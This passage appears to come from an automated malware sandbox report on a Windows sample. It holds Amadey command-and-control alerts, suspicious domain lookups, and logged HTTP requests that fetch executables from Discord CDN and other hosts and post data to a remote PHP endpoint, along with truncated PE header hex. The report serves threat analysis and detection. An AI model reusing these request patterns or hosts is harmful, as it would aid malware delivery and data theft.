MoveFileExW,SetThreadContext,SetEvent,FindActCtxSectionStringW,_memset,SetDefaultCommConfigW,lstrcmpW,HeapSetInformation,GetConsoleMode,GetFileAttributesExW,GetPrivateProfileStructW,SetCriticalSectionSpinCount,GetPrivateProfileStructA,GetSystemTimeAdjustment,GetComputerNameA,GetPrivateProfileStringW,CloseHandle,ExitProcess,

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 4x nop then call 00DE831Fh
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 4x nop then mov edx, dword ptr [ebp+08h]
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 4x nop then mov al, byte ptr [ecx]
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 4x nop then mov edx, dword ptr [ebp+08h]
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 4x nop then mov ax, word ptr [ecx]

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49836 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 185.215.113.35:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: privacytoolzforyou-7000.com
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Domain query: host-file-host-3.com
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 45.9.20.149 ports 42871,1,2,4,7,8

Source: global traffic	HTTP traffic detected: GET /attachments/914960103592054858/914986994759794738/Underdosed.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=t42nernt19g8nsbjut69kb7u9v
Source: global traffic	HTTP traffic detected: POST /tratata.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Q9RQQIMOZU3E3EKXHost: file-file-host4.comContent-Length: 104683Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=t42nernt19g8nsbjut69kb7u9v

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:13:57 GMTContent-Type: application/x-msdos-programContent-Length: 1285856Connection: closeLast-Modified: Mon, 29 Nov 2021 13:05:06 GMTETag: "139ee0-5d1ed16faf7da"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 20 3d 15 26 cf ba ee 2f 19 d3 60 ac 4f 9c ef f1 81 8e a1 4f 5b 97 45 f4 e8 76 69 7c ff 44 43 c7 9e 91 5b 41 d1 06 1c 81 dc 16 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b8 78 cc d8 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 10 03 00 00 72 0c 00 00 00 00 00 00 d0 0f 00 00 20 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 17 00 00 04 00 00 5c 1b 14 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 f4 01 00 00 00 60 03 00 58 6f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 50 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 6f 0c 00 00 60 03 00 58 6f 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 40 07 00 00 d0 0f 00 dd 28 07 00 00 76 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:06 GMTContent-Type: application/x-msdos-programContent-Length: 163328Connection: closeLast-Modified: Tue, 30 Nov 2021 16:21:14 GMTETag: "27e00-5d203f23b200e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 53 ec f2 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 42 01 00 00 ec 74 02 00 00 00 00 12 2a 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 76 02 00 04 00 00 78 5b 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 e8 01 00 78 00 00 00 00 b0 75 02 18 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 61 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 95 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 40 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 90 00 00 00 60 01 00 00 92 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 75 73 02 00 00 02 00 00 18 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 65 66 65 67 00 00 72 02 00 00 00 80 75 02 00 04 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 75 79 75 73 00 00 70 02 00 00 00 90 75 02 00 04 00 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 76 65 6e 75 00 00 00 17 00 00 00 00 a0 75 02 00 02 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 72 73 72 63 00 00 00 18 83 00 00 00 b0 75 02 00 84 00 00 00 fa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:10 GMTContent-Type: application/x-msdos-programContent-Length: 351744Connection: closeLast-Modified: Wed, 01 Dec 2021 08:14:01 GMTETag: "55e00-5d21141ab62f3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 95 6a 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 fe 03 00 00 40 09 00 00 00 00 00 30 d0 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0d 00 00 04 00 00 51 3b 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 f9 03 00 28 00 00 00 00 e0 0c 00 70 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0d 00 38 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c5 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae fd 03 00 00 10 00 00 00 fe 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 10 04 00 00 de 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 41 00 00 00 e0 0c 00 00 42 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 3b 00 00 00 30 0d 00 00 3c 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:13 GMTContent-Type: application/x-msdos-programContent-Length: 336896Connection: closeLast-Modified: Wed, 01 Dec 2021 08:14:01 GMTETag: "52400-5d21141aa49b3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 12 7d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c4 03 00 00 40 09 00 00 00 00 00 f0 94 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 38 71 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 bd 03 00 28 00 00 00 00 b0 0c 00 70 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 34 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 8a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e c2 03 00 00 10 00 00 00 c4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 e0 03 00 00 de 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 41 00 00 00 b0 0c 00 00 42 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b6 3b 00 00 00 00 0d 00 00 3c 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:18 GMTContent-Type: application/x-msdos-programContent-Length: 2740224Connection: closeLast-Modified: Sun, 28 Nov 2021 10:30:25 GMTETag: "29d000-5d1d6cff91027"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 f6 17 4c 43 97 79 1f 43 97 79 1f 43 97 79 1f 57 fc 7a 1e 48 97 79 1f 57 fc 7c 1e e5 97 79 1f 57 fc 7d 1e 51 97 79 1f 57 fc 7e 1e 42 97 79 1f 11 e2 7d 1e 52 97 79 1f 11 e2 7a 1e 56 97 79 1f 11 e2 7c 1e 69 97 79 1f 57 fc 78 1e 50 97 79 1f 43 97 78 1f d0 97 79 1f f6 e2 70 1e 44 97 79 1f f6 e2 86 1f 42 97 79 1f f6 e2 7b 1e 42 97 79 1f 52 69 63 68 43 97 79 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 77 37 a3 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 40 03 00 00 1c 01 00 00 00 00 00 10 52 46 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 6e 00 00 04 00 00 e5 b2 2a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fb 90 04 00 f8 00 00 00 00 a0 04 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 ed 3e 03 00 00 10 00 00 00 90 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 04 da 00 00 00 50 03 00 00 50 00 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 18 00 00 00 30 04 00 00 04 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 e0 01 00 00 00 50 04 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 1c 22 00 00 00 60 04 00 00 1e 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 90 04 00 00 02 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 04 00 00 02 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 68 65 6d 69 64 61 00 a0 41 00 00 b0 04 00 00 00 00 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 c4 27 00 00 50 46 00 00 c4 27 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Wed, 01 Dec 2021 08:14:20 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: closeLast-Modified: Thu, 21 Oct 2021 11:48:30 GMTETag: "9d9d8-5cedb79317f80"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:28 GMTContent-Type: application/x-msdos-programContent-Length: 1143000Connection: closeLast-Modified: Tue, 30 Nov 2021 20:10:32 GMTETag: "1170d8-5d2072645dc9e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 1c 69 a3 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 60 11 00 00 06 00 00 00 00 00 00 9e 7e 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 09 35 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 7e 11 00 4b 00 00 00 00 80 11 00 bc 02 00 00 00 00 00 00 00 00 00 00 00 68 11 00 d8 08 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 5e 11 00 00 20 00 00 00 60 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 02 00 00 00 80 11 00 00 04 00 00 00 62 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 66 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7e 11 00 00 00 00 00 48 00 00 00 02 00 05 00 00 18 02 00 dc 5f 05 00 03 00 00 00 da 07 00 06 dc 77 07 00 eb 89 06 00 c1 7d 11 00 80 